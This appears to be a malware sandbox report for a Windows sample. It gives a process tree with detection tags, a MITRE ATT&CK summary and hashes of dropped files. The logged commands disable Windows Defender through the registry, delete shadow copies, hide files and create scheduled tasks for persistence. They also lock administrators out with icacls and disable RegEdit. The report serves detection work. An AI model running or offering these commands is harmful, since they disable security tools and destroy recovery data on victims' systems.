- Suspicious use of AdjustPrivilegeToken
PID:1092
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"6⤵PID:5292
-
C:\Windows\system32\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath '.pyw'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4780
-
-
C:\Windows\System32\Wbem\wmic.exewmic product get name6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5956
-
-
C:\Windows\SYSTEM32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:5104
-
-
C:\Windows\SYSTEM32\reg.exereg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f6⤵PID:2076
-
-
C:\Windows\SYSTEM32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f6⤵
- Modifies Windows Defender Real-time Protection settings
PID:2936
-
-
C:\Windows\SYSTEM32\reg.exereg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /f6⤵PID:4800
-
-
C:\Windows\SYSTEM32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f6⤵PID:5524
-
-
C:\Windows\SYSTEM32\reg.exereg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableCloudProtection /f6⤵PID:664
-
-
C:\Windows\SYSTEM32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableCloudProtection /t REG_DWORD /d 1 /f6⤵PID:5072
-
-
C:\Windows\SYSTEM32\reg.exereg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Behavior Monitoring" /v DisableBehaviorMonitoring /f6⤵PID:5252
-
-
C:\Windows\SYSTEM32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Behavior Monitoring" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f6⤵PID:1576
-
-
C:\Windows\SYSTEM32\reg.exereg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableNetworkProtection /f6⤵PID:4504
-
-
C:\Windows\SYSTEM32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableNetworkProtection /t REG_DWORD /d 1 /f6⤵PID:4092
-
-
C:\Windows\SYSTEM32\reg.exereg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirusSignatures /f6⤵PID:6076
-
-
C:\Windows\SYSTEM32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirusSignatures /t REG_DWORD /d 1 /f6⤵PID:5376
-
-
C:\Windows\SYSTEM32\reg.exereg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAccess /f6⤵PID:5316
-
-
C:\Windows\SYSTEM32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAccess /t REG_DWORD /d 1 /f6⤵PID:2312
-
-
C:\Windows\SYSTEM32\reg.exereg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableSecurityCenter /f6⤵PID:4420
-
-
C:\Windows\SYSTEM32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableSecurityCenter /t REG_DWORD /d 1 /f6⤵PID:5916
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /f /im firefox.exe"6⤵PID:4804
-
C:\Windows\system32\taskkill.exetaskkill /f /im firefox.exe7⤵
- Kills process with taskkill
PID:3788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "icacls "C:\Users" /grant %username%:F"6⤵PID:3884
-
C:\Windows\system32\icacls.exeicacls "C:\Users" /grant Admin:F7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "schtasks /create /tn "ONEDRIVE-SERVICE" /tr "C:\Users\rayx\starter.exe" /sc onlogon /f"6⤵PID:3068
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "ONEDRIVE-SERVICE" /tr "C:\Users\rayx\starter.exe" /sc onlogon /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:2200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "icacls "C:\Users\rayx" /deny *S-1-1-0:(D)"6⤵PID:1428
-
C:\Windows\system32\icacls.exeicacls "C:\Users\rayx" /deny *S-1-1-0:(D)7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "icacls "C:\Users\rayx" /deny *S-1-5-32-544:(D)"6⤵PID:1164
-
C:\Windows\system32\icacls.exeicacls "C:\Users\rayx" /deny *S-1-5-32-544:(D)7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "icacls "C:\Users\rayx" /deny *S-1-5-32-545:(D)"6⤵PID:5252
-
C:\Windows\system32\icacls.exeicacls "C:\Users\rayx" /deny *S-1-5-32-545:(D)7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c takeown /f C:\Windows\System32\drivers\etc\hosts6⤵PID:1576
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\etc\hosts7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3528
-
-
-
C:\Windows\SYSTEM32\setx.exesetx PATH "C:\Users\systemrayxadmin;C:\Users\Admin\AppData\Local\Temp\_MEI59042\pywin32_system32;C:\Users\Admin\AppData\Local\Temp\_MEI24762\pywin32_system32;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\dotnet\;C:\Users\Admin\AppData\Local\Microsoft\WindowsApps;"6⤵PID:4844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerButtonAction /t REG_DWORD /d 0 /f"6⤵PID:2960
-
C:\Windows\system32\reg.exereg add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerButtonAction /t REG_DWORD /d 0 /f7⤵
- Modifies registry key
PID:1456
-
-
-
C:\Windows\SYSTEM32\diskpart.exediskpart6⤵PID:4468
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f"6⤵PID:1888
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f7⤵
- Disables RegEdit via registry modification
- Modifies registry key
PID:5928
-
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\System32\drivers\etc\hosts /remove "NT AUTHORITY\TrustedInstaller"6⤵PID:2504
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\etc\hosts /remove "NT AUTHORITY\TrustedInstaller"7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1580
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Checkpoint-Computer -Description \"CustomRestorePoint\" -RestorePointType \"MODIFY_SETTINGS\""6⤵
- Command and Scripting Interpreter: PowerShell
PID:2368
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "echo %COMPUTERNAME%"6⤵PID:760
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"6⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5704 -
C:\Windows\system32\netsh.exenetsh wlan show profiles7⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "echo %USERNAME%"6⤵PID:3476
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show interfaces"6⤵PID:5360
-
C:\Windows\system32\netsh.exenetsh wlan show interfaces7⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4356
-
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:2980
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:5964
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:5608
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3088
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:3836
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:5428
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4420
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:1948
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:3200
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:2848
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:5848
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5116
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:1960
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:5932
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6088
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:5876
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:1356
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3908
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:5404
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:3104
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4720
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:448
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:5732
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1388
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:5324
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:5840
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:728
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:4872
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:584
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:4408
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:6088
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:1548
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:3500
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:488
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:3796
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:3180
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:2424
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:1712
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:2484
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:4892
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:2172
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:392
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:844
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:4620
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:2196
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:5716
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:5408
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:324
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:5536
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:1552
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:1476
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:6120
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:3628
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:5852
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:584
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:1896
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:5556
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:4164
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:412
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:2976
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:4132
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:4752
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:4676
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:1320
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:3188
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:1712
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:440
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:5784
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:1392
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:4116
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:4776
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:5296
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:5952
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:4704
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:2036
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:6080
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:392
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:4572
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:880
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:804
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:1124
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:32
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:5812
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:4340
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:5100
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:2220
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:5076
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:5716
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:324
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:5384
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:3884
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:5636
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:3172
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:3980
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:4268
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:3160
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:3992
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:5092
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:3348
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:4948
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:1164
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:4648
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:4600
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:1344
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:4792
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:3808
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq rayxservice.exe"4⤵
- Enumerates processes with tasklist
PID:1068
-
-
C:\Windows\system32\find.exefind /I "rayxservice.exe"4⤵PID:1208
-
-
C:\Windows\system32\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:5428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\systemrayxadmin\rayxservice.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\system32\attrib.exeattrib +h "C:\Users\systemrayxadmin\rayxservice.exe"4⤵
- Views/modifies file attributes
PID:3620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\systemrayxadmin\system.bat""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:5136 -
C:\Windows\system32\attrib.exeattrib +h "C:\Users\systemrayxadmin\system.bat"4⤵
- Views/modifies file attributes
PID:3848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\systemrayxadmin""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\system32\attrib.exeattrib +h "C:\Users\systemrayxadmin"4⤵
- Views/modifies file attributes
PID:5508
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /tn servicebat /tr C:\Users\systemrayxadmin\system.bat /sc onstart /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:3564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "icacls "C:\Users\systemrayxadmin" /deny *S-1-1-0:(D)"3⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\system32\icacls.exeicacls "C:\Users\systemrayxadmin" /deny *S-1-1-0:(D)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "icacls "C:\Users\systemrayxadmin" /deny *S-1-5-32-544:(D)"3⤵
- Suspicious use of WriteProcessMemory
PID:5900 -
C:\Windows\system32\icacls.exeicacls "C:\Users\systemrayxadmin" /deny *S-1-5-32-544:(D)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "icacls "C:\Users\systemrayxadmin" /deny *S-1-5-32-545:(D)"3⤵
- Suspicious use of WriteProcessMemory
PID:5844 -
C:\Windows\system32\icacls.exeicacls "C:\Users\systemrayxadmin" /deny *S-1-5-32-545:(D)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1184
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:496
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:4816
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:5032
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:1664
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:21⤵PID:2296
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Windows Management Instrumentation
1Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
3Disable or Modify Tools
2Safe Mode Boot
1Indicator Removal
2File Deletion
2Modify Registry
4Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
116KB
MD5be8dbe2dc77ebe7f88f910c61aec691a
SHA1a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA2564d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA5120da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655
-
Filesize
48KB
MD5f8dfa78045620cf8a732e67d1b1eb53d
SHA1ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371
-
Filesize
69KB
MD528d2a0405be6de3d168f28109030130c
SHA17151eccbd204b7503f34088a279d654cfe2260c9
SHA2562dfcaec25de17be21f91456256219578eae9a7aec5d21385dec53d0840cf0b8d
SHA512b87f406f2556fac713967e5ae24729e827f2112c318e73fe8ba28946fd6161802de629780fad7a3303cf3dbab7999b15b535f174c85b3cbb7bb3c67915f3b8d0
-
Filesize
802KB
MD59ad5bb6f92ee2cfd29dde8dd4da99eb7
SHA130a8309938c501b336fd3947de46c03f1bb19dc8
SHA256788acbfd0edd6ca3ef3e97a9487eeaea86515642c71cb11bbcf25721e6573ec8
SHA512a166abcb834d6c9d6b25807adddd25775d81e2951e1bc3e9849d8ae868dedf2e1ee1b6b4b288ddfbd88a63a6fa624e2d6090aa71ded9b90c2d8cbf2d9524fdbf
-
Filesize
83KB
MD5223fd6748cae86e8c2d5618085c768ac
SHA1dcb589f2265728fe97156814cbe6ff3303cd05d3
SHA256f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb
SHA5129c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6
-
Filesize
175KB
MD5fcb71ce882f99ec085d5875e1228bdc1
SHA1763d9afa909c15fea8e016d321f32856ec722094
SHA25686f136553ba301c70e7bada8416b77eb4a07f76ccb02f7d73c2999a38fa5fa5b
SHA5124a0e98ab450453fd930edc04f0f30976abb9214b693db4b6742d784247fb062c57fafafb51eb04b7b4230039ab3b07d2ffd3454d6e261811f34749f2e35f04d6
-
Filesize
122KB
MD5bbd5533fc875a4a075097a7c6aba865e
SHA1ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA51223ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e
-
Filesize
245KB
MD53055edf761508190b576e9bf904003aa
SHA1f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890
SHA256e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577
SHA51287538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248
-
Filesize
64KB
MD5eedb6d834d96a3dffffb1f65b5f7e5be
SHA1ed6735cfdd0d1ec21c7568a9923eb377e54b308d
SHA25679c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2
SHA512527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad
-
Filesize
156KB
MD505e8b2c429aff98b3ae6adc842fb56a3
SHA1834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3
-
Filesize
54KB
MD5ba368245d104b1e016d45e96a54dd9ce
SHA1b79ef0eb9557a0c7fa78b11997de0bb057ab0c52
